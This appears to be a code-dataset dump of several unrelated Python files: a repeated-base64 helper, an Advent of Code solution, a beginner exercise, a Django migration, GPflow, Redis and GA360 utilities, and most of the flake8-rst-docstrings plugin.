def Decrypt(byte, loopTime, debug = False):
result = byte
if debug:
for time in range(1, loopTime + 1):
result = base64.b64decode(result, validate = True)
print("Current loop time:", time)
else:
for time in range(1, loopTime + 1):
result = base64.b64decode(result, validate = True)
return result
def TryDecrypt(byte, decryptLastTime = False, debug = False):
result = byte
try:
if debug:
loopTimes = 0
while True:
result = base64.b64decode(result, validate = True)
loopTimes += 1
print("Current loop time:", loopTimes)
print(result)
else:
while True:
result = base64.b64decode(result, validate = True)
except:
if not decryptLastTime:
result = base64.b64encode(result)
return result
def EncryptToFile(byte, loopTime, path, debug = False):
file = open(path, "wb")
file.write(Encrypt(byte, loopTime, debug))
file.close()
def DecryptToFile(byte, loopTime, path, debug = False):
file = open(path, "wb")
file.write(Decrypt(byte, loopTime, debug))
file.close()
def DecryptFromFile(fileObj, loopTime, debug = False):
return Decrypt(fileObj.read(), loopTime, debug)
def EncryptFromFile(fileObj, loopTime, debug = False):
return Encrypt(fileObj.read(), loopTime, debug)
| 2.875
| 3
|
2021/day14/day14.py
|
grecine/advent-of-code
| 0
|
12777732
|
import numpy as np
import os
import time
np.set_printoptions(threshold=np.inf)
def input(fname):
day_dir = os.path.realpath(__file__).split('/')[:-1]
fname = os.path.join('/',*day_dir, fname)
data = []
with open(fname) as f:
for line in f:
data.append(line.strip())
return data
def count_ele(pairs):
elem_count = {e: 0 for e in rules.values()}
for pair in pairs:
elem_count[pair[0][0]] += 0.5*pair[1]
elem_count[pair[0][1]] += 0.5*pair[1]
elem_count[seed[0]] += 0.5
elem_count[seed[-1]] += 0.5
return elem_count
def do_steps(pairs, rules, n):
for i in range(n):
new_pairs = []
for pair in pairs:
insertion = rules[pair[0]]
new_pairs.extend([(pair[0][0]+insertion, pair[1]), (insertion+pair[0][1], pair[1])])
counts = {p: 0 for p in set(np.array(new_pairs)[:,0])}
for n in new_pairs:
counts[n[0]] += n[1]
pairs = [(p, counts[p]) for p in counts]
elem_count = count_ele(pairs)
min_ele = min(elem_count, key=elem_count.get)
max_ele = max(elem_count, key=elem_count.get)
print(int(elem_count[max_ele] - elem_count[min_ele]))
rules = input('input.txt')
# rules = input('test-input.txt')
seed = rules[0]
rules = {d.split(' ')[0]: d.split(' ')[2] for d in rules[2:]}
unique_pairs = set([seed[i]+seed[i+1] for i in range(len(seed)-1)])
pairs = [(p, list(unique_pairs).count(p)) for p in unique_pairs]
# part 1
t0 = time.time()
print('Part 1:')
do_steps(pairs, rules, 10)
print('Elapsed time:',time.time()-t0,' sec')
# part 2
t0 = time.time()
print('\nPart 2:')
do_steps(pairs, rules, 40)
print('Elapsed time:',time.time()-t0,' sec')
| 2.625
| 3
|
PythonExercices/Semana_Python_Ocean_Marco_2021-main/Exercicios_Python_PauloSalvatore/Exercicio_8.py
|
Rkhwong/RHK_PYTHON_LEARNING
| 0
|
12777733
|
"""
Exercício 8
Nome: Comparação de Números: Maior, Menor ou Igual
Objetivo: Receber dois números e exibir qual é maior, menor ou igual a quem.
Dificuldade: Principiante
1 - Escreva um programa que receba dois números, {numero1} e {numero2}:
2 - Caso o {numero1} seja maior do que o {numero2}, exiba na tela: "O número {numero1} é maior do que o número {numero2}.";
3 - Caso contrário, se o {numero1} for menor, exiba: "O número {numero1} é menor que {numero2}.";
4 - Caso contrário, exiba: "O número {numero1} é igual ao número {numero2}.".
"""
# Resolução
def compararNum(x,y):
if x > y:
print("{} Maior que {}".format(x,y))
elif x < y:
print("{} Menor que {}".format(x,y))
else:
print("{} Igual que {}".format(x,y))
x = int(input("Valor A:"))
y = int(input("Valor B:"))
compararNum(x,y)
| 4.40625
| 4
|
nydkcd11/blog/migrations/0019_auto_20170712_2245.py
|
asi14/nydkc11
| 0
|
12777734
|
<gh_stars>0
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-12 22:45
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0018_image_show_home'),
]
operations = [
migrations.AddField(
model_name='link',
name='other_link',
field=models.ManyToManyField(blank=True, related_name='links', to='blog.Post', verbose_name=b'Other Related Posts'),
),
migrations.AlterField(
model_name='link',
name='link',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Post', verbose_name=b'Primary Post'),
),
]
| 1.59375
| 2
|
gpflow/utilities/utilities.py
|
HarrySpearing/GPflow
| 1,724
|
12777735
|
# Copyright 2017-2021 The GPflow Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module is deprecated, and is only provided for backwards compatibility.
It will be removed in GPflow 2.3.
"""
from deprecated import deprecated
from . import misc, traversal
__all__ = []
def _create_module_redirects(m):
for name in m.__all__:
func = getattr(m, name)
assert callable(func), "all names exported by misc and traversal should be functions"
deprecated_func = deprecated(
reason="The gpflow.utilities.utilities module is deprecated and will "
f"be removed in GPflow 2.3; use gpflow.utilities.{name} instead."
)(func)
globals()[name] = deprecated_func
__all__.append(name)
_create_module_redirects(misc)
_create_module_redirects(traversal)
del _create_module_redirects, misc, traversal
| 1.65625
| 2
|
app/utils/redisset.py
|
Maxcutex/pm_api
| 0
|
12777736
|
<reponame>Maxcutex/pm_api
"""RedisSet class for PM."""
from redis import Redis
from config import get_env
END_DELIMITER = "%"
class RedisSet(object):
"""
Implements a simple sorted set with Redis
"""
def __init__(self, name="redis", namespace="pm", url=None):
"""
The default connection parameters are:
host = 'localhost', port = 6379, db = 0
"""
url = url or get_env("REDIS_URL")
self.__db = Redis.from_url(url, charset="utf-8", decode_responses=True)
self.key = f"{namespace}:{name}"
def push(self, item, ending=False):
"""Push item onto the sorted set."""
if ending:
item = f"{item}{END_DELIMITER}"
self.__db.zadd(self.key, {item: 0})
def get(self, prefix, count=50):
"""Get items from the sorted set that match prefix."""
values = []
rangelen = 50
start = self.__db.zrank(self.key, prefix)
if start is None:
return []
while len(values) != count:
ranges = self.__db.zrange(self.key, start, start + rangelen - 1)
start += rangelen
if not ranges or len(ranges) == 0 or ranges is None:
break
for entry in ranges:
minlen = min(len(entry), len(prefix))
if entry[0:minlen] != prefix[0:minlen]:
count = len(values)
break
if entry[-1] == END_DELIMITER and len(values) != count:
values.append(entry[0:-1])
return values
def zrange(self, start, stop):
return self.__db.zrange(self.key, start, stop)
def _delete(self):
self.__db.zremrangebyrank(self.key, 0, -1)
| 2.90625
| 3
|
application/classes/ga360_report_response.py
|
isabella232/report2bq
| 9
|
12777737
|
<reponame>isabella232/report2bq
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
import csv
import dataclasses
import io
import dataclasses_json
from classes.ga360_report import GA360MetricType
from typing import Any, Dict, List, Optional
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class GA360ReportResponse(object):
column_header: GA360ReportResponse.ColumnHeader
data: GA360ReportResponse.ReportData
def to_csv(self, output: io.StringIO) -> None:
# Fetch the field names from the column_header
fieldnames = self.column_header.fieldnames
# Create csv.DictWriter using this and a buffer
writer = \
csv.DictWriter(output, fieldnames=fieldnames, quoting=csv.QUOTE_ALL)
writer.writeheader()
# Write each data row to the csv.DW
for row_data in self.data.rows:
result_row = dict(zip(fieldnames, row_data.row))
writer.writerow(result_row)
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class ColumnHeader(object):
dimensions: List[str]
metric_header: GA360ReportResponse.MetricHeader
@property
def fieldnames(self) -> List[str]:
metric_names = \
[ header.name for header in self.metric_header.metric_header_entries ]
fieldnames = [ *self.dimensions.copy(), *metric_names ]
return fieldnames
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class MetricHeaderEntry(object):
name: str
type: GA360MetricType
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class MetricHeader(object):
metric_header_entries: List[GA360ReportResponse.MetricHeaderEntry]
pivot_headers: Optional[List[Any]] = None
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class ReportData(object):
rows: List[GA360ReportResponse.ReportRow]
totals: List[GA360ReportResponse.DateRangeValues]
row_count: int
minimums: List[GA360ReportResponse.DateRangeValues]
maximums: List[GA360ReportResponse.DateRangeValues]
samples_read_counts: List[str]
sampling_space_sizes: List[str]
is_data_golden: Optional[bool] = None
data_last_refreshed: Optional[str] = None
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class ReportRow(object):
dimensions: List[str]
metrics: List[GA360ReportResponse.DateRangeValues]
@property
def row(self) -> List[str]:
row = [ *self.dimensions, *self.metrics[0].values ]
return row
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class DateRangeValues(object):
values: List[str]
pivot_value_regions: Optional[List[GA360ReportResponse.PivotValueRegion]] = None
@dataclasses_json.dataclass_json(letter_case=dataclasses_json.LetterCase.CAMEL)
@dataclasses.dataclass
class PivotValueRegion(object):
values: List[str]
| 2.625
| 3
|
venv/lib/python3.8/site-packages/flake8_rst_docstrings.py
|
trkohler/biopython
| 0
|
12777738
|
"""Check Python docstrings validate as reStructuredText (RST).
This is a plugin for the tool flake8 tool for checking Python
soucre code.
"""
import logging
import re
import sys
import textwrap
import tokenize as tk
from itertools import chain, dropwhile
try:
from StringIO import StringIO
except ImportError: # Python 3.0 and later
from io import StringIO
from io import TextIOWrapper
#####################################
# Start of backported tokenize code #
#####################################
# If possible (python >= 3.2) use tokenize.open to open files, so PEP 263
# encoding markers are interpreted.
try:
tokenize_open = tk.open
except AttributeError:
# Fall back on a backport of the encoding aware tokenize open function,
# which requires we back port tokenize.detect_encoding to implement.
from codecs import lookup, BOM_UTF8
from io import open as io_open
cookie_re = re.compile(r"^[ \t\f]*#.*?coding[:=][ \t]*([-\w.]+)")
blank_re = re.compile(br"^[ \t\f]*(?:[#\r\n]|$)")
# I don't think 'blank regular expression' is well named, think
# it looks for blank line after any Python # comment removed.
# Key test case of interest is hashbang lines!
assert blank_re.match(b"\n")
assert blank_re.match(b"# Comment\n")
assert blank_re.match(b"#!/usr/bin/python\n")
assert blank_re.match(b"#!/usr/bin/env python\n")
assert not blank_re.match(b'"""Welcome\n')
assert not blank_re.match(b'"""Welcome"""\n')
def _get_normal_name(orig_enc):
"""Imitates get_normal_name in tokenizer.c (PRIVATE)."""
# sys.stderr.write("DEBUG: _get_normal_name(%r)\n" % orig_enc)
# Only care about the first 12 characters.
enc = orig_enc[:12].lower().replace("_", "-")
if enc == "utf-8" or enc.startswith("utf-8-"):
return "utf-8"
if enc in ("latin-1", "iso-8859-1", "iso-latin-1") or enc.startswith(
("latin-1-", "iso-8859-1-", "iso-latin-1-")
):
return "iso-8859-1"
return orig_enc
def _find_cookie(line, filename, bom_found):
"""Find encoding string in a line of Python (PRIVATE)."""
# sys.stderr.write("DEBUG: _find_cookie(%r, %r, %r)\n"
# % (line, filename, bom_found))
match = cookie_re.match(line)
if not match:
return None
encoding = _get_normal_name(match.group(1))
try:
lookup(encoding)
except LookupError:
# This behaviour mimics the Python interpreter
raise SyntaxError(
"unknown encoding for {!r}: {}".format(filename, encoding)
)
if bom_found:
if encoding != "utf-8":
# This behaviour mimics the Python interpreter
raise SyntaxError("encoding problem for {!r}: utf-8".format(filename))
encoding += "-sig"
return encoding
def tokenize_open(filename):
"""Simulate opening a Python file read only with the correct encoding.
While this was based on the Python 3 standard library function
tokenize.open in order to backport it to Python 2.7, this proved
painful.
Note that because this text will later be fed into ``exex(...)`` we
would hit SyntaxError encoding declaration in Unicode string, so the
handle returned has the encoding line masked out!
Note we don't just remove the line as that would throw off the line
numbers, it is replaced with a Python comment.
"""
# sys.stderr.write("DEBUG: tokenize_open(%r)\n" % filename)
# Will check the first & second lines for an encoding
# AND REMOVE IT FROM THE TEXT RETURNED
with io_open(filename, "rb") as handle:
lines = list(handle)
# Find the encoding
first = lines[0] if lines else b""
second = lines[1] if len(lines) > 1 else b""
default = "utf-8"
bom_found = False
if first.startswith(BOM_UTF8):
bom_found = True
first = first[3:]
default = "utf-8-sig"
encoding = _find_cookie(first, filename, bom_found)
if encoding:
lines[0] = "# original encoding removed\n"
if not encoding and blank_re.match(first):
# sys.stderr.write("DEBUG: Trying second line %r\n"
# % second)
encoding = _find_cookie(second, filename, bom_found)
if encoding:
lines[1] = "# original encoding removed\n"
if not encoding:
encoding = default
# sys.stderr.write("DEBUG: tokenize_open using encoding=%r\n"
# % encoding)
# Apply the encoding, using StringIO as we removed the
# original encoding to help legacy code using exec.
# for b in lines:
# sys.stderr.write(b"DEBUG: " + b)
return StringIO("".join(b.decode(encoding) for b in lines))
###################################
# End of backported tokenize code #
###################################
import restructuredtext_lint as rst_lint
__version__ = "0.0.13"
log = logging.getLogger(__name__)
rst_prefix = "RST"
rst_fail_load = 900
rst_fail_parse = 901
rst_fail_all = 902
rst_fail_lint = 903
# Level 1 - info
code_mapping_info = {
"Possible title underline, too short for the title.": 1,
"Unexpected possible title overline or transition.": 2,
}
# Level 2 - warning
code_mapping_warning = {
# XXX ends without a blank line; unexpected unindent:
"Block quote ends without a blank line; unexpected unindent.": 1,
"Bullet list ends without a blank line; unexpected unindent.": 2,
"Definition list ends without a blank line; unexpected unindent.": 3,
"Enumerated list ends without a blank line; unexpected unindent.": 4,
"Explicit markup ends without a blank line; unexpected unindent.": 5,
"Field list ends without a blank line; unexpected unindent.": 6,
"Literal block ends without a blank line; unexpected unindent.": 7,
"Option list ends without a blank line; unexpected unindent.": 8,
# Other:
"Inline strong start-string without end-string.": 10,
"Blank line required after table.": 11,
"Title underline too short.": 12,
"Inline emphasis start-string without end-string.": 13,
"Inline literal start-string without end-string.": 14,
"Inline interpreted text or phrase reference start-string without end-string.": 15,
"Multiple roles in interpreted text (both prefix and suffix present; only one allowed).": 16, # noqa: E501
"Mismatch: both interpreted text role suffix and reference suffix.": 17,
"Literal block expected; none found.": 18,
"Inline substitution_reference start-string without end-string.": 19,
}
# Level 3 - error
code_mapping_error = {
"Unexpected indentation.": 1,
"Malformed table.": 2,
# e.g. Unknown directive type "req".
"Unknown directive type": 3,
# e.g. Unknown interpreted text role "need".
"Unknown interpreted text role": 4,
# e.g. Undefined substitution referenced: "dict".
"Undefined substitution referenced:": 5,
# e.g. Unknown target name: "license_txt".
"Unknown target name:": 6,
}
# Level 4 - severe
code_mapping_severe = {"Unexpected section title.": 1}
code_mappings_by_level = {
1: code_mapping_info,
2: code_mapping_warning,
3: code_mapping_error,
4: code_mapping_severe,
}
def code_mapping(level, msg, extra_directives, extra_roles, default=99):
"""Return an error code between 0 and 99."""
try:
return code_mappings_by_level[level][msg]
except KeyError:
pass
# Following assumes any variable messages take the format
# of 'Fixed text "variable text".' only:
# e.g. 'Unknown directive type "req".'
# ---> 'Unknown directive type'
# e.g. 'Unknown interpreted text role "need".'
# ---> 'Unknown interpreted text role'
if msg.count('"') == 2 and ' "' in msg and msg.endswith('".'):
txt = msg[: msg.index(' "')]
value = msg.split('"', 2)[1]
if txt == "Unknown directive type" and value in extra_directives:
return 0
if txt == "Unknown interpreted text role" and value in extra_roles:
return 0
return code_mappings_by_level[level].get(txt, default)
return default
####################################
# Start of code copied from PEP257 #
####################################
# This is the reference implementation of the alogrithm
# in PEP257 for removing the indentation of a docstring,
# which has been placed in the public domain.
#
# This includes the minor change from sys.maxint to
# sys.maxsize for Python 3 compatibility.
#
# https://www.python.org/dev/peps/pep-0257/#handling-docstring-indentation
def trim(docstring):
"""PEP257 docstring indentation trim function."""
if not docstring:
return ""
# Convert tabs to spaces (following the normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
indent = sys.maxsize
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxsize:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Return a single string:
return "\n".join(trimmed)
##################################
# End of code copied from PEP257 #
##################################
def dequote_docstring(text):
"""Remove the quotes delimiting a docstring."""
# TODO: Process escaped characters unless raw mode?
text = text.strip()
if len(text) > 6 and text[:3] == text[-3:] == '"""':
# Standard case, """..."""
return text[3:-3]
if len(text) > 7 and text[:4] in ('u"""', 'r"""') and text[-3:] == '"""':
# Unicode, u"""...""", or raw r"""..."""
return text[4:-3]
# Other flake8 tools will report atypical quotes:
if len(text) > 6 and text[:3] == text[-3:] == "'''":
return text[3:-3]
if len(text) > 7 and text[:4] in ("u'''", "r'''") and text[-3:] == "'''":
return text[4:-3]
if len(text) > 2 and text[0] == text[-1] == '"':
return text[1:-1]
if len(text) > 3 and text[:2] in ('u"', 'r"') and text[-1] == '"':
return text[2:-1]
if len(text) > 2 and text[0] == text[-1] == "'":
return text[1:-1]
if len(text) > 3 and text[:2] in ("u'", "r'") and text[-1] == "'":
return text[2:-1]
raise ValueError("Bad quotes!")
##################################################
# Start of code copied from pydocstyle/parser.py #
##################################################
def humanize(string):
"""Make a string human readable."""
return re.compile(r"(.)([A-Z]+)").sub(r"\1 \2", string).lower()
class Value(object):
"""A generic object with a list of preset fields."""
def __init__(self, *args):
"""Initialize."""
if len(self._fields) != len(args):
raise ValueError(
"got {} arguments for {} fields for {}: {}".format(
len(args), len(self._fields), self.__class__.__name__, self._fields
)
)
vars(self).update(zip(self._fields, args))
def __hash__(self):
"""Hash."""
return hash(repr(self))
def __eq__(self, other):
"""Equality."""
return other and vars(self) == vars(other)
def __repr__(self):
"""Representation."""
kwargs = ", ".join(
"{}={!r}".format(field, getattr(self, field)) for field in self._fields
)
return "{}({})".format(self.__class__.__name__, kwargs)
class Definition(Value):
"""A Python source code definition (could be class, function, etc)."""
_fields = (
"name",
"_source",
"start",
"end",
"decorators",
"docstring",
"children",
"parent",
"skipped_error_codes",
)
_human = property(lambda self: humanize(type(self).__name__))
kind = property(lambda self: self._human.split()[-1])
module = property(lambda self: self.parent.module)
all = property(lambda self: self.module.all)
_slice = property(lambda self: slice(self.start - 1, self.end))
is_class = False
def __iter__(self):
"""Iterate."""
return chain([self], *self.children)
@property
def _publicity(self):
return {True: "public", False: "private"}[self.is_public]
@property
def source(self):
"""Return the source code for the definition."""
full_src = self._source[self._slice]
def is_empty_or_comment(line):
return line.strip() == "" or line.strip().startswith("#")
filtered_src = dropwhile(is_empty_or_comment, reversed(full_src))
return "".join(reversed(list(filtered_src)))
def __str__(self):
"""Definition as a string."""
out = "in {} {} `{}`".format(self._publicity, self._human, self.name)
if self.skipped_error_codes:
out += " (skipping {})".format(self.skipped_error_codes)
return out
class Module(Definition):
"""A Python source code module."""
_fields = (
"name",
"_source",
"start",
"end",
"decorators",
"docstring",
"children",
"parent",
"_all",
"future_imports",
"skipped_error_codes",
)
_nest = staticmethod(lambda s: {"def": Function, "class": Class}[s])
module = property(lambda self: self)
all = property(lambda self: self._all)
@property
def is_public(self):
"""Is the module public."""
return not self.name.startswith("_") or self.name.startswith("__")
def __str__(self):
"""Definition as a string."""
return "at module level"
class Package(Module):
"""A package is a __init__.py module."""
class Function(Definition):
"""A Python source code function."""
_nest = staticmethod(lambda s: {"def": NestedFunction, "class": NestedClass}[s])
@property
def is_public(self):
"""Return True iff this function should be considered public."""
if self.all is not None:
return self.name in self.all
else:
return not self.name.startswith("_")
@property
def is_test(self):
"""Return True if this function is a test function/method.
We exclude tests from the imperative mood check, because to phrase
their docstring in the imperative mood, they would have to start with
a highly redundant "Test that ...".
"""
return self.name.startswith("test") or self.name == "runTest"
class NestedFunction(Function):
"""A Python source code nested function."""
is_public = False
class Method(Function):
"""A Python source code method."""
@property
def is_magic(self):
"""Return True iff this method is a magic method (e.g., `__str__`)."""
return (
self.name.startswith("__")
and self.name.endswith("__")
and self.name not in VARIADIC_MAGIC_METHODS
)
@property
def is_public(self):
"""Return True iff this method should be considered public."""
# Check if we are a setter/deleter method, and mark as private if so.
for decorator in self.decorators:
# Given 'foo', match 'foo.bar' but not 'foobar' or 'sfoo'
if re.compile(r"^{}\.".format(self.name)).match(decorator.name):
return False
name_is_public = (
not self.name.startswith("_")
or self.name in VARIADIC_MAGIC_METHODS
or self.is_magic
)
return self.parent.is_public and name_is_public
class Class(Definition):
"""A Python source code class."""
_nest = staticmethod(lambda s: {"def": Method, "class": NestedClass}[s])
is_public = Function.is_public
is_class = True
class NestedClass(Class):
"""A Python source code nested class."""
@property
def is_public(self):
"""Return True iff this class should be considered public."""
return (
not self.name.startswith("_")
and self.parent.is_class
and self.parent.is_public
)
class Decorator(Value):
"""A decorator for function, method or class."""
_fields = "name arguments".split()
VARIADIC_MAGIC_METHODS = ("__init__", "__call__", "__new__")
class AllError(Exception):
"""Raised when there is a problem with __all__ when parsing."""
def __init__(self, message):
"""Initialize the error with a more specific message."""
Exception.__init__(
self,
message
+ textwrap.dedent(
"""
That means pydocstyle cannot decide which definitions are
public. Variable __all__ should be present at most once in
each file, in form
`__all__ = ('a_public_function', 'APublicClass', ...)`.
More info on __all__: http://stackoverflow.com/q/44834/. ')
"""
),
)
class TokenStream(object):
"""Token stream."""
# A logical newline is where a new expression or statement begins. When
# there is a physical new line, but not a logical one, for example:
# (x +
# y)
# The token will be tk.NL, not tk.NEWLINE.
LOGICAL_NEWLINES = {tk.NEWLINE, tk.INDENT, tk.DEDENT}
def __init__(self, filelike):
"""Initialize."""
self._generator = tk.generate_tokens(filelike.readline)
self.current = Token(*next(self._generator, None))
self.line = self.current.start[0]
self.log = log
self.got_logical_newline = True
def move(self):
"""Move."""
previous = self.current
current = self._next_from_generator()
self.current = None if current is None else Token(*current)
self.line = self.current.start[0] if self.current else self.line
self.got_logical_newline = previous.kind in self.LOGICAL_NEWLINES
return previous
def _next_from_generator(self):
try:
return next(self._generator, None)
except (SyntaxError, tk.TokenError):
self.log.warning("error generating tokens", exc_info=True)
return None
def __iter__(self):
"""Iterate."""
while True:
if self.current is not None:
yield self.current
else:
return
self.move()
class TokenKind(int):
"""Kind of token."""
def __repr__(self):
"""Representation."""
return "tk.{}".format(tk.tok_name[self])
class Token(Value):
"""Token."""
_fields = "kind value start end source".split()
def __init__(self, *args):
"""Initialize."""
super(Token, self).__init__(*args)
self.kind = TokenKind(self.kind)
class Parser(object):
"""A Python source code parser."""
def parse(self, filelike, filename):
"""Parse the given file-like object and return its Module object."""
self.log = log
self.source = filelike.readlines()
src = "".join(self.source)
# This may raise a SyntaxError:
compile(src, filename, "exec")
self.stream = TokenStream(StringIO(src))
self.filename = filename
self.all = None
self.future_imports = set()
self._accumulated_decorators = []
return self.parse_module()
# TODO: remove
def __call__(self, *args, **kwargs):
"""Call the parse method."""
return self.parse(*args, **kwargs)
current = property(lambda self: self.stream.current)
line = property(lambda self: self.stream.line)
def consume(self, kind):
"""Consume one token and verify it is of the expected kind."""
next_token = self.stream.move()
assert next_token.kind == kind
def leapfrog(self, kind, value=None):
"""Skip tokens in the stream until a certain token kind is reached.
If `value` is specified, tokens whose values are different will also
be skipped.
"""
while self.current is not None:
if self.current.kind == kind and (
value is None or self.current.value == value
):
self.consume(kind)
return
self.stream.move()
def parse_docstring(self):
"""Parse a single docstring and return its value."""
self.log.debug(
"parsing docstring, token is %r (%s)", self.current.kind, self.current.value
)
while self.current.kind in (tk.COMMENT, tk.NEWLINE, tk.NL):
self.stream.move()
self.log.debug(
"parsing docstring, token is %r (%s)",
self.current.kind,
self.current.value,
)
if self.current.kind == tk.STRING:
docstring = self.current.value
self.stream.move()
return docstring
return None
def parse_decorators(self): # noqa : D401
"""Called after first @ is found.
Parse decorators into self._accumulated_decorators.
Continue to do so until encountering the 'def' or 'class' start token.
"""
name = []
arguments = []
at_arguments = False
while self.current is not None:
self.log.debug(
"parsing decorators, current token is %r (%s)",
self.current.kind,
self.current.value,
)
if self.current.kind == tk.NAME and self.current.value in ["def", "class"]:
# Done with decorators - found function or class proper
break
elif self.current.kind == tk.OP and self.current.value == "@":
# New decorator found. Store the decorator accumulated so far:
self._accumulated_decorators.append(
Decorator("".join(name), "".join(arguments))
)
# Now reset to begin accumulating the new decorator:
name = []
arguments = []
at_arguments = False
elif self.current.kind == tk.OP and self.current.value == "(":
at_arguments = True
elif self.current.kind == tk.OP and self.current.value == ")":
# Ignore close parenthesis
pass
elif self.current.kind == tk.NEWLINE or self.current.kind == tk.NL:
# Ignore newlines
pass
else:
# Keep accumulating current decorator's name or argument.
if not at_arguments:
name.append(self.current.value)
else:
arguments.append(self.current.value)
self.stream.move()
# Add decorator accumulated so far
self._accumulated_decorators.append(
Decorator("".join(name), "".join(arguments))
)
def parse_definitions(self, class_, all=False):
"""Parse multiple definitions and yield them."""
while self.current is not None:
self.log.debug(
"parsing definition list, current token is %r (%s)",
self.current.kind,
self.current.value,
)
self.log.debug("got_newline: %s", self.stream.got_logical_newline)
if all and self.current.value == "__all__":
self.parse_all()
elif (
self.current.kind == tk.OP
and self.current.value == "@"
and self.stream.got_logical_newline
):
self.consume(tk.OP)
self.parse_decorators()
elif self.current.value in ["def", "class"]:
yield self.parse_definition(class_._nest(self.current.value))
elif self.current.kind == tk.INDENT:
self.consume(tk.INDENT)
for definition in self.parse_definitions(class_):
yield definition
elif self.current.kind == tk.DEDENT:
self.consume(tk.DEDENT)
return
elif self.current.value == "from":
self.parse_from_import_statement()
else:
self.stream.move()
def parse_all(self):
"""Parse the __all__ definition in a module."""
assert self.current.value == "__all__"
self.consume(tk.NAME)
if self.current.value != "=":
raise AllError("Could not evaluate contents of __all__. ")
self.consume(tk.OP)
if self.current.value not in "([":
raise AllError("Could not evaluate contents of __all__. ")
self.consume(tk.OP)
self.all = []
all_content = "("
while self.current.kind != tk.OP or self.current.value not in ")]":
if self.current.kind in (tk.NL, tk.COMMENT):
pass
elif self.current.kind == tk.STRING or self.current.value == ",":
all_content += self.current.value
else:
raise AllError(
"Unexpected token kind in __all__: {!r}. ".format(
self.current.kind
)
)
self.stream.move()
self.consume(tk.OP)
all_content += ")"
try:
self.all = eval(all_content, {})
except BaseException as e:
raise AllError(
"Could not evaluate contents of __all__."
"\bThe value was {}. The exception was:\n{}".format(all_content, e)
)
def parse_module(self):
"""Parse a module (and its children) and return a Module object."""
self.log.debug("parsing module.")
start = self.line
docstring = self.parse_docstring()
children = list(self.parse_definitions(Module, all=True))
assert self.current is None, self.current
end = self.line
cls = Module
if self.filename.endswith("__init__.py"):
cls = Package
module = cls(
self.filename,
self.source,
start,
end,
[],
docstring,
children,
None,
self.all,
None,
"",
)
for child in module.children:
child.parent = module
module.future_imports = self.future_imports
self.log.debug("finished parsing module.")
return module
def parse_definition(self, class_):
"""Parse a definition and return its value in a `class_` object."""
start = self.line
self.consume(tk.NAME)
name = self.current.value
self.log.debug("parsing %s '%s'", class_.__name__, name)
self.stream.move()
if self.current.kind == tk.OP and self.current.value == "(":
parenthesis_level = 0
while True:
if self.current.kind == tk.OP:
if self.current.value == "(":
parenthesis_level += 1
elif self.current.value == ")":
parenthesis_level -= 1
if parenthesis_level == 0:
break
self.stream.move()
if self.current.kind != tk.OP or self.current.value != ":":
self.leapfrog(tk.OP, value=":")
else:
self.consume(tk.OP)
if self.current.kind in (tk.NEWLINE, tk.COMMENT):
skipped_error_codes = self.parse_skip_comment()
self.leapfrog(tk.INDENT)
assert self.current.kind != tk.INDENT
docstring = self.parse_docstring()
decorators = self._accumulated_decorators
self.log.debug("current accumulated decorators: %s", decorators)
self._accumulated_decorators = []
self.log.debug("parsing nested definitions.")
children = list(self.parse_definitions(class_))
self.log.debug("finished parsing nested definitions for '%s'", name)
end = self.line - 1
else: # one-liner definition
skipped_error_codes = ""
docstring = self.parse_docstring()
decorators = [] # TODO
children = []
end = self.line
self.leapfrog(tk.NEWLINE)
definition = class_(
name,
self.source,
start,
end,
decorators,
docstring,
children,
None,
skipped_error_codes,
)
for child in definition.children:
child.parent = definition
self.log.debug(
"finished parsing %s '%s'. Next token is %r (%s)",
class_.__name__,
name,
self.current.kind,
self.current.value,
)
return definition
def parse_skip_comment(self):
"""Parse a definition comment for noqa skips."""
skipped_error_codes = ""
if self.current.kind == tk.COMMENT:
if "noqa: " in self.current.value:
skipped_error_codes = "".join(self.current.value.split("noqa: ")[1:])
elif self.current.value.startswith("# noqa"):
skipped_error_codes = "all"
return skipped_error_codes
def check_current(self, kind=None, value=None):
"""Verify the current token is of type `kind` and equals `value`."""
msg = textwrap.dedent(
"""
Unexpected token at line {self.line}:
In file: {self.filename}
Got kind {self.current.kind!r}
Got value {self.current.value}
""".format(
self=self
)
)
kind_valid = self.current.kind == kind if kind else True
value_valid = self.current.value == value if value else True
assert kind_valid and value_valid, msg
def parse_from_import_statement(self):
"""Parse a 'from x import y' statement.
The purpose is to find __future__ statements.
"""
self.log.debug("parsing from/import statement.")
